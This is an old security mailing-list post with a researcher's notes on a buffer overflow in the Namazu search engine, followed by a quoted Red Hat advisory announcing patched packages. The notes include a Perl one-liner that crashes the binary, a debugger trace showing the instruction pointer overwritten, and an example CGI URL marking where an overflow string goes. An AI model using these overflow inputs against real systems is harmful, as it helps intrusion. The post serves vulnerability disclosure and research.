Details on the updated namazu packages that are available

[KF <dotslash () snosoft com>]

Doh! Looks like I slept on this one too long... heres some of my 
personal notes on exploiting this issue. Have fun.
-KF

[root@linuxppc root]# cat misc/namzu-overflow.txt

http://www.altavista.com/sites/search/web?q=url%3Anamazu.cgi&kl=XX

This is what caught my attention
[msg(XXX)] like 12 days old
[msg(XXX)] 2001-12-12  NOKUBI Takatsugu  <knok () daionet gr jp>
[msg(XXX)] (nmz_choose_msgfile_suffix): Fixed buffer overflow.
[msg(XXX)] 
http://cvs.namazu.org/~checkout~/namazu/ChangeLog?rev=1.912&content-type=text/plain

2001-12-11 NOKUBI Takatsugu <knok () daionet gr jp>

* nmz/field.c: Fixed possibility of buffer overflow.

2001-12-04 NOKUBI Takatsugu <knok () daionet gr jp>

* src/{form.c,rcfile.c,result.c}: Fixed possibility of buffer overflow.

* src/cgi.c (validate_idxname): Fixed another cross-site scripting
vulnerability.
(cgi_get_vars): Fixed possibility of buffer overflow.

2001-07-03 Yoshinori TAKESAKO <takesako () namazu org>

* src/result.c (my_strcasestr): Checked a buffer overflow,
the case where a character sequence was over at the 1st byte
      of EUC-JP.

Here is my research on the above issues:
There are several buffer overflows in the QUERY_STRING options
Unfortunately the check in namazu.h screws us...

[root@linuxppc src]# grep CGI_QUERY_MAX *.h
namazu.h:    CGI_QUERY_MAX       = 512, /* Max length of a CGI query */

cgi.c:        if (contlen > CGI_QUERY_MAX) {
cgi.c:            printf(_("Too long QUERY_STRING"));

In other words unless you have modified namazu then you are not vuln.
Now we can exploit this via the command line as a side note ... although 
its not suid...
[root@linuxppc src]# ./namazu querystring `perl -e 'print "A" x 1024'`
Results:

References:  [  (can't open the index)  ]

No document matching your query.
Aborted (core dumped)

The eip is easily overwritten.Here only the first 2 bytes...
Starting program: /root/namazu-2.0.5/src/../src/.libs/lt-namazu yamom
`perl -e 'print "A" x 1342'`

Program received signal SIGILL, Illegal instruction.
0x41412f4c in ?? ()
So just for theory sake and cuz I want to
code something...

we will say that we are using a Custom namazu that we modified the 
following values in namazu.h.

  CGI_QUERY_MAX       = 512, /* Max length of a CGI query */
  CGI_INDEX_NAME_MAX  = 64,  /* Max length of an index name in a CGI 
query */

Then we could be exploited.

cgi-bin/namazu.cgi?query=overflow&whence=0=en&idxname=<bof here> would 
be a quick example.

-KF

bugzilla () redhat com wrote:

> ---------------------------------------------------------------------
>                    Red Hat, Inc. Red Hat Security Advisory
>
> Synopsis:          Updated namazu packages are available
> Advisory ID:       RHSA-2001:179-05
> Issue date:        2001-12-27
> Updated on:        2002-01-09
> Product:           Red Hat Linux
> Keywords:          namazu cross-site scripting buffer overflow
> Cross references:  
> Obsoletes:         RHSA-2001:162
> ---------------------------------------------------------------------
>
> 1. Topic:
>
> Updated namazu packages are available for Red Hat Linux 7.0J. These
> packages fix cross-site scripting vulnerabilities. It also fixes a possible
> buffer overflow.
>
> 2. Relevant releases/architectures:
>
> Red Hat Linux 7.0J - i386
>
> 3. Problem description:
>
> Namazu is a full-text search engine. Namazu 2.0.9 and earlier may
> inadvertently include malicious HTML tags or scripts in a dynamically
> generated page, based on unvalidated input from untrustworthy sources.
> Also, a buffer overflow vulnerability exists in the buffer size of an
> environment variable.
>
> These packages update Namazu to version 2.0.10 which is not vulnerable to
> these issues.
>
> 4. Solution:
>
> Before applying this update, make sure all previously released errata
> relevant to your system have been applied.
>
> To update all RPMs for your particular architecture, run:
>
> rpm -Fvh [filenames]
>
> where [filenames] is a list of the RPMs you wish to upgrade.  Only those
> RPMs which are currently installed will be updated.  Those RPMs which are
> not installed but included in the list will not be updated.  Note that you
> can also use wildcards (*.rpm) if your current directory *only* contains the
> desired RPMs.
>
> Please note that this update is also available via Red Hat Network.  Many
> people find this an easier way to apply updates.  To use Red Hat Network,
> launch the Red Hat Update Agent with the following command:
>
> up2date
>
> This will start an interactive process that will result in the appropriate
> RPMs being upgraded on your system.
>
> 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
>
>
>
> 6. RPMs required:
>
> Red Hat Linux 7.0J:
>
> SRPMS:
> ftp://updates.redhat.com/7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
>
> i386:
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
>
>
>
> 7. Verification:
>
> MD5 sum                          Package Name
> --------------------------------------------------------------------------
> 521c9faef31dcd865d3e0090cd023d70 7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
> ae5d586caf2098a0b9aefcc7af6522a9 7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> 904dc3993c140794373471e8a1c64c61 7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
> af30f16968c527ac9e7669c812618cde 7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
>  
>
> These packages are GPG signed by Red Hat, Inc. for security.  Our key
> is available at:
>     http://www.redhat.com/about/contact/pgpkey.html
>
> You can verify each package with the following command:
>     rpm --checksig  <filename>
>
> If you only wish to verify that each package has not been corrupted or
> tampered with, examine only the md5sum with the following command:
>     rpm --checksig --nogpg <filename>
>
> 8. References:
>
> http://www.namazu.org/#news
>
>
> Copyright(c) 2000, 2001, 2002 Red Hat, Inc.